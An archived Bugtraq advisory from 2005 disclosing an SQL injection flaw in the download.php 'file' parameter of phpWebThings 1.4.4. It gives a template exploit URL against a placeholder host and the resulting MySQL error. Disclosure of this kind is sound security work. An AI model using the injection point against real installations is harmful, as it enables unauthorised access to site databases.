SQL injection in phpWebThing 1.4.4

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: SQL injection in phpWebThing 1.4.4
From: A.1.M@xxxxxxxxxxx
Date: 11 Nov 2005 11:45:49 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

Vulnerable: phpWebThings 1.4.4
website : http://phpwebthings.org

The bug in download.php

ThE Exploit :

http://www.target.com/download.php?file=|SQL


ThE Error:

You have an error in your SQL syntax. Check the manual that corresponds to your 
MySQL server version for the right syntax to use near 'order by date DESC' at 
line 1

AhLaM
http://www.lezr.com/vb
Best Regards ,,,

Prev by Date: Multiple Bugs in MyBB 1.0 PR2 Rev 686(Updated Nov 1, 2005)
Next by Date: ZRCSA-200502 - phpAdsNew SQL Injection Vulnerabilities
Previous by thread: Multiple Bugs in MyBB 1.0 PR2 Rev 686(Updated Nov 1, 2005)
Next by thread: ZRCSA-200502 - phpAdsNew SQL Injection Vulnerabilities
Index(es):
- Date
- Thread